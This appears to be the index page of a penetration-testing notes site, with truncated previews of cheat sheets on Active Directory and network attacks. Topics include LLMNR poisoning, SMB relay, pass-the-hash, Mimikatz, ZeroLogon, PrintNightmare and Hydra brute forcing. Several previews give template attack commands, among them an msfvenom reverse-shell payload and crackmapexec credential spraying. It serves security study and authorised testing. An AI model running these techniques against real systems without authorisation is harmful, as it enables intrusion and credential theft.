Notes & Cheat Sheets
File Transfers and Data Exfiltration
Post Exploitation: Enumeration
Post Exploitation: Attacks
Automation with Ansible
FleetDM On Debian 11
Initial Attack Vectors
Internal: Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: Attack vectors that could work in both internal and external ...
A place to keep cheat sheets and configuration guides related to Wazuh that are otherwise too short for a blog post.
LLMNR Poisoning (Internal)
Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack works by sending a router advertisement to the multicast address ff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announc...
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an insecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...
Overview A set of PowerShell functions that can be used to enumerate Active Directory. Part of the larger PowerSploit framework. Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...
1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navigate to http://localhost:7474 Log in as neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password 3. Da...
Users net.exe Local net user net user <username> Domain net user /domain net user <username> /domain PowerShell Local Get-LocalUser Domain # Can enumerate specific users by changing the search filter $dom = [System.DirectoryServices.Active...
Pass the Password
Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Attack 1: crackmapexec sudo crackmapexec smb <target-or...
Pass the Hash
Overview Dumped the SAM or LSA and now have hashes for domain or local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Anatomy of a Windows Hash username:SID:LM_HASH:NT...
Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a website. The tokens are generated once a user logs onto a system or RDP session. They remain unt...
Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...
Group Policy Preferences (GPP)
Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...
Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-ip...
Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimikatz is primarily used to dump hashes from LSASS, pass hashes, or generate Kerberos tickets for use in attacks. ...
Caution This can potentially break a domain controller, due to the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...
AES 256 ECB
Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt The hint says to hash the word "ippsec" with the MD5 algorithm This is the key to decrypt the hash Hash Base 6...
Use FFUF to Brute Force Login
Brute Force with a Request File Start Burp Make a randomized login to the target web page Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...
Brute Forcing Logins with Hydra
Example Usage hydra -IVVf [ip-or-hostname] -t [threads] -l [username] -P [password-list] [http-<method>-form] [path-to-login-page:<username-param>=^USER^&<password-param>=^PASS^&<additional-form-param>=[param-value]:<login-error-message>:<session-id> I like ...
Nmap Scanning with Categories
Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...